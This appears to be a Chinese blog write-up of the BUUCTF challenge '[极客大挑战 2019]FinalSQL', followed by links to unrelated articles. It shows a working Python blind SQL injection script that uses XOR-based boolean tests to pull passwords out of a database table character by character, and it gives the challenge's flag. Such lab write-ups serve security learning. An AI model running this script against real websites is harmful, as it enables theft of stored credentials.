[极客大挑战 2019]FinalSQL1

打开题目

sql注入,点击1试一下

点击2试一下

点击3试一下

点击4

点击5

id=6试一下

感觉是sql盲注了

编写脚本

import requests

import string

from time import sleep

url = "http://9da9cb18-3096-413a-9476-8a177ffec31a.node4.buuoj.cn:81/search.php?id=0\^({})"

如果为真时的关键字匹配

base = 'Click others'

盲注的字符集

chars = string.printable

inject = "ord(substr(reverse((SELECT(GROUP_CONCAT(password))FROM(geek.F1naI1y))),{},1))={}"

for i in range(1, 1000):

continue_ = False

for c in chars:

u = url.format(inject.format(i,ord(c)))

res = requests.get(u)

while res.status_code == 429:

sleep(1)

res = requests.get(u)

if base in res.text:

print(c,end='',flush=True)

continue_ = True

break

if not continue_:

break(参考博客)

得到flag倒序,更正为

得到flag

flag{87c0b617-4e80-4135-b08c-ad013c856e27}

相关推荐
2601_9549711320 小时前
没有SQL基础能学数据分析吗?先学什么更合适
数据库·sql·数据分析
旺仔Sec21 小时前
国光sqlsec_upload-labs靶场渗透测试通关解析教程总结
web安全·网络安全
PawSQL21 小时前
同一条SQL,单机秒回,分布式集群卡成PPT——问题究竟出在哪?
数据库·分布式·sql
金融小白数据分析之路21 小时前
go 查询 sql go-sqlite3 版本
sql·golang·sqlite
尚雷55801 天前
oracle知识整理_锁及等待事件SQL_第二部分
数据库·sql·oracle·锁及等待事件
深邃-1 天前
【Web安全】-云服务器与Docker(2):Docker镜像操作,Docker容器操作,Docker搭建漏洞靶场
linux·服务器·web安全·网络安全·docker
谪星·阿凯1 天前
内网信息收集技术博客
安全·web安全·网络安全·php
Sombra_Olivia1 天前
Vulhub 中的 Cacti-CVE-2023-39361
安全·web安全·渗透测试·vulhub
Waay1 天前
“红帽系统管理二”知识点问答题:第11章 管理网络安全
网络·安全·web安全
冬天vs不冷2 天前
面试必知必会(14):MySQL执行计划与SQL优化
sql·mysql·面试